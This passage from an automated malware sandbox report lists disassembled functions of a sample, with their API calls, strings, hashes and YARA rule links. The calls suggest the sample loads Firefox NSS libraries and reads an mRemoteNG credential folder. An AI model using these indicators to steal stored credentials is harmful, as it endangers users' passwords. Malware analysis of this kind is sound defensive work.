Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
String ID:
API String ID: 3590924995-0
Opcode ID: 3659dfaf599ca2893a17646f28d7d5e26368a59e124f871afb6a585040e0b8b5
Instruction ID: ff81e746649468b020bfb1248019ef8598f60dd1c2ff538117c41b5e248d1b82
Opcode Fuzzy Hash: 3659dfaf599ca2893a17646f28d7d5e26368a59e124f871afb6a585040e0b8b5
Instruction Fuzzy Hash: DF316FB4A047029FDB00AFB9C084669B7F4FF15358F015669D89997B00EB35E896CFC2

Uniqueness

Uniqueness Score: -1.00%

Function 6C968C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C968C1B
EnterCriticalSection.KERNEL32 ref: 6C968C34
PL_ArenaAllocate.NSS3 ref: 6C968C65
PR_Unlock.NSS3 ref: 6C968C9C
PR_Unlock.NSS3 ref: 6C968CB6

Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4

Strings

KRAM, xrefs: 6C968C8F

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: b2384def64ae43b179bdc99087f032698346c267ab7ac21199b13ea0b58c44d4
Instruction ID: 2cf7cff0dc5bcd0e2fb39230833877d7181c3aa8e4cf0054881d0100ffa5bd88
Opcode Fuzzy Hash: b2384def64ae43b179bdc99087f032698346c267ab7ac21199b13ea0b58c44d4
Instruction Fuzzy Hash: 082180B16056018FE704AF79C484569BBF4FF16308F05896AD888CBB51EB39D886CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6CA62C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CA62CA0
PR_ExitMonitor.NSS3 ref: 6CA62CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CA62CD1
strdup.MOZGLUE(?), ref: 6CA62CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CA62D27

Strings

Loaded library %s (static lib), xrefs: 6CA62D22

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 9a8442896f4cb9c9e2da53b664ed40ee54b85ca809685c1cc1f052969bbe3b7c
Instruction ID: c1b44c2474b3647b18c8a0f02381d77db3ef4ff6eb730fb97276d6767d537b0a
Opcode Fuzzy Hash: 9a8442896f4cb9c9e2da53b664ed40ee54b85ca809685c1cc1f052969bbe3b7c
Instruction Fuzzy Hash: 9D11E2B16003069FEB188F26D845AA677B5AB4634DF18C22DD90987F51E732D889CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9BCCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C9BDAE2,?), ref: 6C9BC6C2

PR_Now.NSS3 ref: 6C9BCD35

Part of subcall function 6CA19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DC6
Part of subcall function 6CA19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DD1
Part of subcall function 6CA19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA19DED

Part of subcall function 6C9A6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C951C6F,00000000,00000004,?,?), ref: 6C9A6C3F

PR_GetCurrentThread.NSS3 ref: 6C9BCD54

Part of subcall function 6CA19BF0: TlsGetValue.KERNEL32(?,?,?,6CA60A75), ref: 6CA19C07

Part of subcall function 6C9A7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C951CCC,00000000,00000000,?,?), ref: 6C9A729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C9BCD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C9BCE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C9BCE2C

Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C9BCE40

Part of subcall function 6C9B14C0: TlsGetValue.KERNEL32 ref: 6C9B14E0
Part of subcall function 6C9B14C0: EnterCriticalSection.KERNEL32 ref: 6C9B14F5
Part of subcall function 6C9B14C0: PR_Unlock.NSS3 ref: 6C9B150D

Part of subcall function 6C9BCEE0: PORT_ArenaMark_Util.NSS3(?,6C9BCD93,?), ref: 6C9BCEEE
Part of subcall function 6C9BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C9BCD93,?), ref: 6C9BCEFC
Part of subcall function 6C9BCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C9BCD93,?), ref: 6C9BCF0B
Part of subcall function 6C9BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C9BCD93,?), ref: 6C9BCF1D

Part of subcall function 6C9BCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C9BCD93,?), ref: 6C9BCF47
Part of subcall function 6C9BCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C9BCD93,?), ref: 6C9BCF67
Part of subcall function 6C9BCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C9BCD93,?,?,?,?,?,?,?,?,?,?,?,6C9BCD93,?), ref: 6C9BCF78

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: c52d4aa01439aadeccc0ba06426ca2031a5e3638d4a13ee7e64a5b4f7ed08c9f
Instruction ID: dfffdd3dea3b4fd4b92f8156145b5cdb8e8dc07630447d3a4cb75597d610dd38
Opcode Fuzzy Hash: c52d4aa01439aadeccc0ba06426ca2031a5e3638d4a13ee7e64a5b4f7ed08c9f
Instruction Fuzzy Hash: 4C51A1B6A00205EBEB10DF69DC40BAB73E8EF58348F250524E955BBB40EB31ED05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C96E400 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E44F

Part of subcall function 6C972C40: TlsGetValue.KERNEL32(6C973F23,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C62
Part of subcall function 6C972C40: EnterCriticalSection.KERNEL32(0000001C,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C76
Part of subcall function 6C972C40: PL_HashTableLookup.NSS3(00000000,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C86
Part of subcall function 6C972C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C96E477,?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C972C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C973F23,?), ref: 6C96E52F

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 43b860bd467ea78eeb33a65a3dd57169e35f4bd41ca6a33b0bf8c7bbf8b50816
Instruction ID: de49fd1ee665f877e4d49dfe98f7eb8185cc2f49f81d4906a14be9f2903938e2
Opcode Fuzzy Hash: 43b860bd467ea78eeb33a65a3dd57169e35f4bd41ca6a33b0bf8c7bbf8b50816
Instruction Fuzzy Hash: 344137B4A05706CFEF00EF79D98456ABBF4FF15304B054969D8949BB50E730E885CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C9665D0 Relevance: 9.1, APIs: 6, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(-00000007), ref: 6C96660F

Part of subcall function 6C9B0BE0: malloc.MOZGLUE(6C9A8D2D,?,00000000,?), ref: 6C9B0BF8
Part of subcall function 6C9B0BE0: TlsGetValue.KERNEL32(6C9A8D2D,?,00000000,?), ref: 6C9B0C15

free.MOZGLUE(00000000), ref: 6C966660
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C96667B
SGN_DecodeDigestInfo.NSS3(?), ref: 6C96669B
SECOID_GetAlgorithmTag_Util.NSS3(-00000004), ref: 6C9666B0
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C9666C8

Part of subcall function 6C9925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?,?), ref: 6C992670
Part of subcall function 6C9925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C96662E,?), ref: 6C992684
Part of subcall function 6C9925D0: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926C2
Part of subcall function 6C9925D0: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C9926E0
Part of subcall function 6C9925D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C9926F4
Part of subcall function 6C9925D0: PR_Unlock.NSS3(?), ref: 6C99274D

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: UtilValue$CriticalEnterSectionUnlock$AlgorithmAlloc_Arena_DecodeDigestErrorFreeInfoTag_freemalloc
String ID:
API String ID: 2025608128-0
Opcode ID: 9257083a7ac4564696510c9bd84c39053a0f3850d3807ec8cca0f71ec323f3e6
Instruction ID: fb9e27cb934d0a6d2477417ea37e180ec8f9f114acfac968c0d1fc6e9205e2e3
Opcode Fuzzy Hash: 9257083a7ac4564696510c9bd84c39053a0f3850d3807ec8cca0f71ec323f3e6
Instruction Fuzzy Hash: A53165B5A0121A9BEB00CFA9E845AAE77B8EF59258F140128EC15E7B40E731D905C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00417BAE

Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B

DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB

Part of subcall function 004179C2: EncodePointer.KERNEL32(00000000,004191B2,00423DC8,00000314,00000000,?,?,?,?,?,00417F08,00423DC8,Microsoft Visual C++ Runtime Library,00012010), ref: 004179C4

DecodePointer.KERNEL32(-00000004,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C21
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C34
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417C3E

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction ID: 2ecc3aad81c9b81e2b27e7e3d170e1f8428b359c85680f8586e03e13f1a28f2c
Opcode Fuzzy Hash: 6a1b6e47f482ee4f200ebd968e601a8bdb3106e7e8c25533cbe6d2efabcc28cd
Instruction Fuzzy Hash: 39314C70A58309DBDF509FA9D8846DDBBF1BB48314F10802BE001A6290EB7C49C5CFAD

Uniqueness

Uniqueness Score: -1.00%

Function 6C93C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C93C4F0
free.MOZGLUE ref: 6C93C51A
TlsSetValue.KERNEL32 ref: 6C93C540
free.MOZGLUE ref: 6C93C557
DeleteCriticalSection.KERNEL32 ref: 6C93C56A
free.MOZGLUE ref: 6C93C576

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: 802806bb435f5d9898e0446fd5172a6dbd197c4e134e1da83b53ac7074738480
Instruction ID: a422ed74b48f20f2ab250df1ad149e1822badebacd622fe27cdda9d73d1be018
Opcode Fuzzy Hash: 802806bb435f5d9898e0446fd5172a6dbd197c4e134e1da83b53ac7074738480
Instruction Fuzzy Hash: 7D115174608B128BDB10BFB9D04826EBBF4BF55748F015A1DD8CA87600EB35D445CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00415960 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(02F65410,?,?,?,0040F76C,?,02F65410,00000000), ref: 0041596C
lstrcpyn.KERNEL32(C:\Users\user\AppData\Roaming\mRemoteNG\,02F65410,02F65410,?,0040F76C,?,02F65410), ref: 00415990
lstrlen.KERNEL32(?,?,0040F76C,?,02F65410), ref: 004159A7
wsprintfA.USER32 ref: 004159C7

Strings

C:\Users\user\AppData\Roaming\mRemoteNG\, xrefs: 0041598B, 004159C0, 004159D0
%s%s, xrefs: 004159B5

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\AppData\Roaming\mRemoteNG\
API String ID: 1206339513-1027354905
Opcode ID: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction ID: ad4ab28855ecf1822f83189248f4f970b5300654cb1d5d0a0ffaf2e78bbea45f
Opcode Fuzzy Hash: 145a19e204c32b80f721800f8dc263c6d3553908343d9ba3445ddbc103129e49
Instruction Fuzzy Hash: 69015A75510908FFCB14DFA8D948EAE7BB9FF88344F108588F90A9B340CA71AA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6C8DE4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8DE53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8DE5BC

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8DE525, 6C8DE596, 6C8DE5A7
%s at line %d of [%.10s], xrefs: 6C8DE534, 6C8DE5B6
database corruption, xrefs: 6C8DE52F, 6C8DE5B1

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 49aee81b6a76ffc66541ec46daa5b52094d0173012f24a847d811d98540b7059
Instruction ID: 99ffc0515068fce6f13b02d74c57769c9a338cbd59b41542473c6c02abbad3f6
Opcode Fuzzy Hash: 49aee81b6a76ffc66541ec46daa5b52094d0173012f24a847d811d98540b7059
Instruction Fuzzy Hash: 6A3144306507249FC3218EADC88196AF3B0FB42664B550E7CE848A7B41F360F989C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 6C940DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C940BDE), ref: 6C940DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C940BDE), ref: 6C940DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C940BDE), ref: 6C940DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C940BDE), ref: 6C940E32

Strings

%s incr => %d (find lib), xrefs: 6C940E2D

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: eb95efdc56d2ce7d1fb20cc972063ab130eca1ccf5a08fa3bb86ee10cb463f84
Instruction ID: df70821911efb05cbeaacb90d7ae76f01609d80c01a2ae5167e7cc1e7ef8e8b8
Opcode Fuzzy Hash: eb95efdc56d2ce7d1fb20cc972063ab130eca1ccf5a08fa3bb86ee10cb463f84
Instruction Fuzzy Hash: DA0124727007209FE7208F259C45E2773FCDB45B09B05842DE909D7A41E762EC6987E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C99C590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C99C5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C99C603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C99C636
PK11_FreeSymKey.NSS3(?), ref: 6C99C6D7
PK11_FreeSymKey.NSS3(?), ref: 6C99C6E1

Memory Dump Source

Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: 8c27436957fc5584d6415a95fb795c3acc998b1cb2d3afd86114d64b6a2d8efc
Instruction ID: 68ed61f79a141fd3fbc83ddffc20544a1b571c63b56846002d7b20ea4871f106
Opcode Fuzzy Hash: 8c27436957fc5584d6415a95fb795c3acc998b1cb2d3afd86114d64b6a2d8efc
Instruction Fuzzy Hash: C04163B560120AAFDB019F69DC81DAB77A9EF28248B584038FD09D7711E732D925CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040F200 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F228
strtok_s.MSVCRT ref: 0040F36D

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

